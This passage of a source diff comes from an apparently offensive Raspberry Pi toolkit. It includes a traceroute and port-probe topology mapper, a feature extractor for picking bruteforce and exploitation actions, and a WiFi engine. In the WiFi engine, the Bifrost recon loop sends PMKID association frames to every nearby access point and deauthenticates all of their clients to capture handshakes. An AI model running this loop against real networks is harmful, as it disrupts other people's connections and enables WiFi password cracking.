lines.append(" classDef unknown fill:#ccc,stroke:#333,stroke-dasharray: 5 5;")
nodes = topology.get("nodes", {})
for node_id, node in nodes.items():
label = node.get("hostname") or node.get("ip")
node_type = node.get("type", "unknown")
# Sanitize label for Mermaid
safe_label = str(label).replace(" ", "_").replace(".", "_").replace("-", "_")
safe_id = node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")
lines.append(f' {safe_id}["{label}"]')
if node_type == "target":
lines.append(f" class {safe_id} target")
elif node_type == "router":
lines.append(f" class {safe_id} router")
else:
lines.append(f" class {safe_id} unknown")
edges = topology.get("edges", [])
for edge in edges:
src = str(edge.get("source", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
dst = str(edge.get("target", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
if src and dst:
rtt = edge.get("rtt_ms", 0)
if rtt > 0:
lines.append(f" {src} -- {rtt}ms --> {dst}")
else:
lines.append(f" {src} --> {dst}")
return "\n".join(lines)
def _reverse_dns(ip: str) -> str:
"""Best-effort reverse DNS lookup. Returns hostname or empty string."""
try:
hostname, _, _ = socket.gethostbyaddr(ip)
return hostname or ""
except Exception:
return ""
def _tcp_probe(ip: str, port: int, timeout_s: float) -> Tuple[bool, int]:
"""
Quick TCP connect probe. Returns (is_open, rtt_ms).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
t0 = time.time()
try:
rc = s.connect_ex((ip, int(port)))
rtt_ms = int((time.time() - t0) * 1000)
return (rc == 0), rtt_ms
except Exception:
return False, 0
finally:
try:
s.close()
except Exception:
pass
def _scapy_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
ICMP traceroute using scapy. Returns list of hop dicts:
[{"hop": 1, "ip": "x.x.x.x", "rtt_ms": 12}, ...]
"""
hops: List[Dict[str, Any]] = []
for ttl in range(1, max_depth + 1):
pkt = IP(dst=target, ttl=ttl) / ICMP()
t0 = time.time()
reply = sr1(pkt, timeout=timeout_s, verbose=0)
rtt_ms = int((time.time() - t0) * 1000)
if reply is None:
hops.append({"hop": ttl, "ip": "*", "rtt_ms": 0})
continue
src = reply.src
hops.append({"hop": ttl, "ip": src, "rtt_ms": rtt_ms})
# Reached destination
if src == target:
break
return hops
def _subprocess_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
Fallback traceroute using the system `traceroute` command.
Works on Linux / macOS. On Windows falls back to `tracert`.
"""
import subprocess
import re
hops: List[Dict[str, Any]] = []
# Decide command based on platform
if os.name == "nt":
cmd = ["tracert", "-d", "-h", str(max_depth), "-w", str(int(timeout_s * 1000)), target]
else:
cmd = ["traceroute", "-n", "-m", str(max_depth), "-w", str(int(timeout_s)), target]
try:
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=max_depth * timeout_s + 30,
)
output = proc.stdout or ""
except FileNotFoundError:
logger.error("traceroute/tracert command not found on this system")
return hops
except subprocess.TimeoutExpired:
logger.warning(f"Subprocess traceroute to {target} timed out")
return hops
except Exception as exc:
logger.error(f"Subprocess traceroute error: {exc}")
return hops
# Parse output lines
ip_pattern = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
rtt_pattern = re.compile(r'(\d+(?:\.\d+)?)\s*ms')
hop_num = 0
for line in output.splitlines():
stripped = line.strip()
if not stripped:
continue
# Skip header lines
parts = stripped.split()
if not parts:
continue
# Try to extract hop number from first token
try:
hop_candidate = int(parts[0])
except (ValueError, IndexError):
continue
hop_num = hop_candidate
ip_match = ip_pattern.search(stripped)
rtt_match = rtt_pattern.search(stripped)
hop_ip = ip_match.group(1) if ip_match else "*"
hop_rtt = int(float(rtt_match.group(1))) if rtt_match else 0
hops.append({"hop": hop_num, "ip": hop_ip, "rtt_ms": hop_rtt})
# Stop if we reached the target
if hop_ip == target:
break
return hops
def _load_existing_topology(output_dir: str) -> Dict[str, Any]:
"""
Load the most recent aggregated topology JSON from output_dir.
Returns an empty topology skeleton if nothing exists yet.
"""
skeleton: Dict[str, Any] = {
"version": b_version,
"nodes": {},
"edges": [],
"metadata": {
"created": datetime.utcnow().isoformat() + "Z",
"updated": datetime.utcnow().isoformat() + "Z",
"run_count": 0,
},
}
if not os.path.isdir(output_dir):
return skeleton
# Find the latest aggregated file
candidates = []
try:
for fname in os.listdir(output_dir):
if fname.startswith("topology_aggregate") and fname.endswith(".json"):
fpath = os.path.join(output_dir, fname)
candidates.append((os.path.getmtime(fpath), fpath))
except Exception:
return skeleton
if not candidates:
return skeleton
candidates.sort(reverse=True)
latest_path = candidates[0][1]
try:
with open(latest_path, "r", encoding="utf-8") as fh:
data = json.load(fh)
if isinstance(data, dict) and "nodes" in data:
return data
except Exception as exc:
logger.warning(f"Failed to load existing topology ({latest_path}): {exc}")
return skeleton
def _merge_node(existing: Dict[str, Any], new: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two node dicts, preferring newer / non-empty values."""
merged = dict(existing)
for key, val in new.items():
if val is None or val == "" or val == []:
continue
if key == "open_ports":
# Union of port lists
old_ports = set(merged.get("open_ports") or [])
old_ports.update(val if isinstance(val, list) else [])
merged["open_ports"] = sorted(old_ports)
elif key == "rtt_ms":
# Keep lowest non-zero RTT
old_rtt = merged.get("rtt_ms") or 0
new_rtt = val or 0
if old_rtt == 0:
merged["rtt_ms"] = new_rtt
elif new_rtt > 0:
merged["rtt_ms"] = min(old_rtt, new_rtt)
else:
merged[key] = val
merged["last_seen"] = datetime.utcnow().isoformat() + "Z"
return merged
def _edge_key(src: str, dst: str) -> str:
"""Canonical edge key (sorted to avoid duplicates)."""
a, b = sorted([src, dst])
return f"{a}--{b}"
# -------------------- Main Action Class --------------------
class YggdrasilMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
# ---- Phase 1: Traceroute ----
def _phase_traceroute(
self,
ip: str,
max_depth: int,
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> List[Dict[str, Any]]:
"""Run traceroute to target. Returns list of hop dicts."""
logger.info(f"Phase 1: Traceroute to {ip} (max_depth={max_depth})")
if _SCAPY_AVAILABLE:
hops = _scapy_traceroute(ip, max_depth, probe_timeout)
else:
hops = _subprocess_traceroute(ip, max_depth, probe_timeout)
# Progress: phase 1 is 0-30% (weight = 30% of total_steps)
phase1_steps = max(1, int(total_steps * 0.30))
progress.advance(phase1_steps)
logger.info(f"Traceroute to {ip}: {len(hops)} hop(s) discovered")
return hops
# ---- Phase 2: Service Enrichment ----
def _phase_enrich(
self,
ip: str,
mac: str,
row: Dict[str, Any],
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Enrich the target node with port / service data from the DB and
optional TCP connect probes.
"""
logger.info(f"Phase 2: Service enrichment for {ip}")
node_info: Dict[str, Any] = {
"ip": ip,
"mac": mac,
"hostname": "",
"open_ports": [],
"verified_ports": {},
"vendor": "",
}
# Read hostname
hostname = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
if not hostname:
hostname = _reverse_dns(ip)
node_info["hostname"] = hostname
# Query DB for known ports to prioritize probing
db_ports = []
try:
# mac is available in the scope
host_data = self.shared_data.db.get_host_by_mac(mac)
if host_data and host_data.get("ports"):
# Normalize ports from DB string
db_ports = [int(p) for p in str(host_data["ports"]).split(";") if p.strip().isdigit()]
except Exception as e:
logger.debug(f"Failed to query DB for host ports: {e}")
# Fallback to defaults if DB is empty
if not db_ports:
# Read existing ports from DB row (compatibility)
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
db_ports.append(int(p))
node_info["open_ports"] = sorted(set(db_ports))
# Vendor and OS guessing
vendor = str(row.get("Vendor") or row.get("vendor") or "").strip()
if not vendor and host_data:
vendor = host_data.get("vendor", "")
node_info["vendor"] = vendor
# Guess OS if missing (leveraging FeatureLogger patterns if we had access, but we'll do basic here)
# For now, we'll just store what we have.
# Verify a small set of key ports via TCP connect
verified: Dict[str, Dict[str, Any]] = {}
# Prioritize ports we found in DB + a few common ones
probe_candidates = sorted(set(db_ports + _VERIFY_PORTS))[:10]
for port in probe_candidates:
if self.shared_data.orchestrator_should_exit:
break
is_open, rtt = _tcp_probe(ip, port, probe_timeout)
if is_open:
verified[str(port)] = {"open": is_open, "rtt_ms": rtt}
# Update node_info open_ports if we found a new one
if port not in node_info["open_ports"]:
node_info["open_ports"].append(port)
node_info["open_ports"].sort()
node_info["verified_ports"] = verified
# Progress: phase 2 is 30-60%
phase2_steps = max(1, int(total_steps * 0.30))
progress.advance(phase2_steps)
self.shared_data.log_milestone(b_class, "Enrichment", f"Discovered {len(node_info['open_ports'])} ports for {ip}")
return node_info
# ---- Phase 3: Build Topology ----
def _phase_build_topology(
self,
ip: str,
hops: List[Dict[str, Any]],
target_node: Dict[str, Any],
progress: ProgressTracker,
total_steps: int,
) -> Tuple[Dict[str, Dict[str, Any]], List[Dict[str, Any]]]:
"""
Build nodes dict and edges list from traceroute hops and target enrichment.
"""
logger.info(f"Phase 3: Building topology graph for {ip}")
nodes: Dict[str, Dict[str, Any]] = {}
edges: List[Dict[str, Any]] = []
# Add target node
nodes[ip] = {
"ip": ip,
"type": "target",
"hostname": target_node.get("hostname", ""),
"mac": target_node.get("mac", ""),
"vendor": target_node.get("vendor", ""),
"open_ports": target_node.get("open_ports", []),
"verified_ports": target_node.get("verified_ports", {}),
"rtt_ms": 0,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
# Add hop nodes and edges
prev_ip: Optional[str] = None
for hop in hops:
hop_ip = hop.get("ip", "*")
hop_rtt = hop.get("rtt_ms", 0)
hop_num = hop.get("hop", 0)
if hop_ip == "*":
# Unknown hop -- still create a placeholder node
placeholder = f"*_hop{hop_num}"
nodes[placeholder] = {
"ip": placeholder,
"type": "unknown_hop",
"hostname": "",
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": 0,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": placeholder,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = placeholder
continue
# Real hop IP
if hop_ip not in nodes:
hop_hostname = _reverse_dns(hop_ip)
nodes[hop_ip] = {
"ip": hop_ip,
"type": "router" if hop_ip != ip else "target",
"hostname": hop_hostname,
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": hop_rtt,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
else:
# Update RTT if this hop is lower
existing_rtt = nodes[hop_ip].get("rtt_ms") or 0
if existing_rtt == 0 or (hop_rtt > 0 and hop_rtt < existing_rtt):
nodes[hop_ip]["rtt_ms"] = hop_rtt
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": hop_ip,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = hop_ip
# Progress: phase 3 is 60-80% (weight = 20% of total_steps)
phase3_steps = max(1, int(total_steps * 0.20))
progress.advance(phase3_steps)
logger.info(f"Topology for {ip}: {len(nodes)} node(s), {len(edges)} edge(s)")
return nodes, edges
# ---- Phase 4: Aggregate ----
def _phase_aggregate(
self,
new_nodes: Dict[str, Dict[str, Any]],
new_edges: List[Dict[str, Any]],
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Merge new topology data with previous runs.
"""
logger.info("Phase 4: Aggregating topology data")
topology = _load_existing_topology(OUTPUT_DIR)
# Merge nodes
existing_nodes = topology.get("nodes") or {}
if not isinstance(existing_nodes, dict):
existing_nodes = {}
for node_id, node_data in new_nodes.items():
if node_id in existing_nodes:
existing_nodes[node_id] = _merge_node(existing_nodes[node_id], node_data)
else:
existing_nodes[node_id] = node_data
topology["nodes"] = existing_nodes
# Merge edges (deduplicate by canonical key)
existing_edges = topology.get("edges") or []
if not isinstance(existing_edges, list):
existing_edges = []
seen_keys: set = set()
merged_edges: List[Dict[str, Any]] = []
for edge in existing_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
for edge in new_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
topology["edges"] = merged_edges
# Update metadata
meta = topology.get("metadata") or {}
meta["updated"] = datetime.utcnow().isoformat() + "Z"
meta["run_count"] = int(meta.get("run_count") or 0) + 1
meta["node_count"] = len(existing_nodes)
meta["edge_count"] = len(merged_edges)
topology["metadata"] = meta
topology["version"] = b_version
# Progress: phase 4 is 80-95% (weight = 15% of total_steps)
phase4_steps = max(1, int(total_steps * 0.15))
progress.advance(phase4_steps)
logger.info(
f"Aggregated topology: {meta['node_count']} node(s), "
f"{meta['edge_count']} edge(s), run #{meta['run_count']}"
)
return topology
# ---- Phase 5: Save ----
def _phase_save(
self,
topology: Dict[str, Any],
ip: str,
progress: ProgressTracker,
total_steps: int,
) -> str:
"""
Save topology JSON to disk. Returns the file path written.
"""
logger.info("Phase 5: Saving topology data")
os.makedirs(OUTPUT_DIR, exist_ok=True)
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H-%M-%SZ")
# Per-target snapshot
snapshot_name = f"topology_{ip.replace('.', '_')}_{timestamp}.json"
snapshot_path = os.path.join(OUTPUT_DIR, snapshot_name)
# Aggregated file (single canonical file, overwritten each run)
aggregate_name = f"topology_aggregate_{timestamp}.json"
aggregate_path = os.path.join(OUTPUT_DIR, aggregate_name)
try:
with open(snapshot_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Snapshot saved: {snapshot_path}")
except Exception as exc:
logger.error(f"Failed to write snapshot {snapshot_path}: {exc}")
try:
with open(aggregate_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Aggregate saved: {aggregate_path}")
except Exception as exc:
logger.error(f"Failed to write aggregate {aggregate_path}: {exc}")
# Save Mermaid diagram
mermaid_path = os.path.join(OUTPUT_DIR, f"topology_{ip.replace('.', '_')}_{timestamp}.mermaid")
try:
mermaid_str = _generate_mermaid_topology(topology)
with open(mermaid_path, "w", encoding="utf-8") as fh:
fh.write(mermaid_str)
logger.info(f"Mermaid topology saved: {mermaid_path}")
except Exception as exc:
logger.error(f"Failed to write Mermaid topology: {exc}")
# Progress: phase 5 is 95-100% (weight = 5% of total_steps)
phase5_steps = max(1, int(total_steps * 0.05))
progress.advance(phase5_steps)
self.shared_data.log_milestone(b_class, "Save", f"Topology saved for {ip}")
return aggregate_path
# ---- Main execute ----
def execute(self, ip, port, row, status_key) -> str:
"""
Orchestrator entry point. Maps topology for a single target host.
Returns:
'success' -- topology data written successfully.
'failed' -- an error prevented meaningful output.
'interrupted' -- orchestrator requested early exit.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from DB row ---
mac = (
row.get("MAC Address")
or row.get("mac_address")
or row.get("mac")
or ""
).strip()
hostname = (
row.get("Hostname")
or row.get("hostname")
or row.get("hostnames")
or ""
).strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Configurable arguments ---
max_depth = int(getattr(self.shared_data, "yggdrasil_max_depth", 15))
probe_timeout = float(getattr(self.shared_data, "yggdrasil_probe_timeout", 2.0))
# Clamp to sane ranges
max_depth = max(5, min(max_depth, 30))
probe_timeout = max(1.0, min(probe_timeout, 5.0))
# --- UI status ---
self.shared_data.bjorn_orch_status = "yggdrasil_mapper"
self.shared_data.bjorn_status_text2 = f"{ip}"
self.shared_data.comment_params = {"ip": ip, "mac": mac, "phase": "init"}
# Total steps for progress (arbitrary units; phases will consume proportional slices)
total_steps = 100
progress = ProgressTracker(self.shared_data, total_steps)
try:
# ---- Phase 1: Traceroute (0-30%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.log_milestone(b_class, "Traceroute", f"Running trace to {ip}")
hops = self._phase_traceroute(ip, max_depth, probe_timeout, progress, total_steps)
# ---- Phase 2: Service Enrichment (30-60%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "enrich"}
target_node = self._phase_enrich(ip, mac, row, probe_timeout, progress, total_steps)
# ---- Phase 3: Build Topology (60-80%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "topology"}
new_nodes, new_edges = self._phase_build_topology(
ip, hops, target_node, progress, total_steps
)
# ---- Phase 4: Aggregate (80-95%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "aggregate"}
topology = self._phase_aggregate(new_nodes, new_edges, progress, total_steps)
# ---- Phase 5: Save (95-100%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "save"}
saved_path = self._phase_save(topology, ip, progress, total_steps)
# Final UI update
node_count = len(topology.get("nodes") or {})
edge_count = len(topology.get("edges") or [])
hop_count = len([h for h in hops if h.get("ip") != "*"])
self.shared_data.comment_params = {
"ip": ip,
"hops": str(hop_count),
"nodes": str(node_count),
"edges": str(edge_count),
"file": os.path.basename(saved_path),
}
progress.set_complete()
logger.info(
f"YggdrasilMapper complete for {ip}: "
f"{hop_count} hops, {node_count} nodes, {edge_count} edges"
)
return "success"
except Exception as exc:
logger.error(f"YggdrasilMapper failed for {ip}: {exc}", exc_info=True)
self.shared_data.comment_params = {"ip": ip, "error": str(exc)[:120]}
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="YggdrasilMapper (network topology mapper)")
parser.add_argument("--ip", required=True, help="Target IP to trace")
parser.add_argument("--max-depth", type=int, default=15, help="Max traceroute depth")
parser.add_argument("--timeout", type=float, default=2.0, help="Probe timeout in seconds")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so execute() picks them up
sd.yggdrasil_max_depth = args.max_depth
sd.yggdrasil_probe_timeout = args.timeout
mapper = YggdrasilMapper(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": "",
}
result = mapper.execute(args.ip, None, row, "yggdrasil_mapper")
print(f"Result: {result}")

1121
ai_engine.py Normal file

File diff suppressed because it is too large Load Diff

99
ai_utils.py Normal file
View File

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except:
return "00:00:00:00:00:00"

585
bifrost/__init__.py Normal file
View File

@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
return bool(self.shared_data.config.get('bifrost_enabled', False))
def start(self):
"""Start the Bifrost engine (bettercap + agent loop)."""
if self._running:
logger.warning("Bifrost already running")
return
# Wait for any previous thread to finish before re-starting
if self._thread and self._thread.is_alive():
logger.warning("Previous Bifrost thread still running — waiting ...")
self._stop_event.set()
self._thread.join(timeout=15)
logger.info("Starting Bifrost engine ...")
self._stop_event.clear()
self._running = True
self._monitor_failed = False
self._monitor_torn_down = False
self._thread = threading.Thread(
target=self._loop, daemon=True, name="BifrostEngine"
)
self._thread.start()
def stop(self):
"""Stop the Bifrost engine gracefully.
Signals the daemon loop to exit, then waits for it to finish.
The loop's finally block handles bettercap shutdown and monitor teardown.
"""
if not self._running:
return
logger.info("Stopping Bifrost engine ...")
self._stop_event.set()
self._running = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=15)
self._thread = None
self.agent = None
# Safety net: teardown is idempotent, so this is a no-op if
# _loop()'s finally already ran it.
self._stop_bettercap()
self._teardown_monitor_mode()
logger.info("Bifrost engine stopped")
def _loop(self):
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
try:
# Install compatibility shim for pwnagotchi plugins
from bifrost import plugins as bfplugins
from bifrost.compat import install_shim
install_shim(self.shared_data, bfplugins)
# Setup monitor mode on the WiFi interface
self._setup_monitor_mode()
if self._monitor_failed:
logger.error(
"Monitor mode setup failed — Bifrost cannot operate without monitor "
"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
"https://github.com/seemoo-lab/nexmon — "
"Or use an external USB WiFi adapter with monitor mode support.")
# Teardown first (restores network services) BEFORE switching mode,
# so the orchestrator doesn't start scanning on a dead network.
self._teardown_monitor_mode()
self._running = False
# Now switch mode back to AUTO — the network should be restored.
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
try:
self.shared_data.config["bifrost_enabled"] = False
self.shared_data.config["manual_mode"] = False
self.shared_data.config["ai_mode"] = False
self.shared_data.manual_mode = False
self.shared_data.ai_mode = False
self.shared_data.invalidate_config_cache()
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
except Exception:
pass
return
# Start bettercap
self._start_bettercap()
self._stop_event.wait(3) # Give bettercap time to initialize
if self._stop_event.is_set():
return
# Create agent (pass stop_event so its threads exit cleanly)
from bifrost.agent import BifrostAgent
self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
# Load plugins
bfplugins.load(self.shared_data.config)
# Initialize agent
self.agent.start()
logger.info("Bifrost agent started — entering recon cycle")
# Main recon loop (port of do_auto_mode from pwnagotchi)
while not self._stop_event.is_set():
try:
# Full spectrum scan
self.agent.recon()
if self._stop_event.is_set():
break
# Get APs grouped by channel
channels = self.agent.get_access_points_by_channel()
# For each channel
for ch, aps in channels:
if self._stop_event.is_set():
break
self.agent.set_channel(ch)
# For each AP on this channel
for ap in aps:
if self._stop_event.is_set():
break
# Send association frame for PMKID
self.agent.associate(ap)
# Deauth all clients for full handshake
for sta in ap.get('clients', []):
if self._stop_event.is_set():
break
self.agent.deauth(ap, sta)
if not self._stop_event.is_set():
self.agent.next_epoch()
except Exception as e:
if 'wifi.interface not set' in str(e):
logger.error("WiFi interface lost: %s", e)
self._stop_event.wait(60)
if not self._stop_event.is_set():
self.agent.next_epoch()
else:
logger.error("Recon loop error: %s", e)
self._stop_event.wait(5)
except Exception as e:
logger.error("Bifrost engine fatal error: %s", e)
finally:
from bifrost import plugins as bfplugins
bfplugins.shutdown()
self._stop_bettercap()
self._teardown_monitor_mode()
self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
def _setup_monitor_mode(self):
"""Put the WiFi interface into monitor mode.
Strategy order:
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
3. iw — direct fallback for other drivers
"""
self._monitor_torn_down = False
self._nexmon_used = False
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
# If configured iface already ends with 'mon', derive the base name
if iface.endswith('mon'):
base_iface = iface[:-3] # e.g. 'wlan0mon' -> 'wlan0'
else:
base_iface = iface
# Store original interface name for teardown
self._base_iface = base_iface
self._mon_iface = iface
# Check if a monitor interface already exists
if iface != base_iface and self._iface_exists(iface):
logger.info("Monitor interface %s already exists", iface)
return
# ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
if self._is_brcmfmac(base_iface):
logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
if self._has_nexmon():
if self._setup_nexmon(base_iface, cfg):
return
# nexmon setup failed — don't try other strategies, they won't work either
self._monitor_failed = True
return
else:
logger.error(
"Broadcom brcmfmac chip requires nexmon firmware patches for "
"monitor mode. Install nexmon manually using install_nexmon.sh "
"or visit: https://github.com/seemoo-lab/nexmon")
self._monitor_failed = True
return
# ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
airmon_ok = False
try:
logger.info("Killing interfering processes ...")
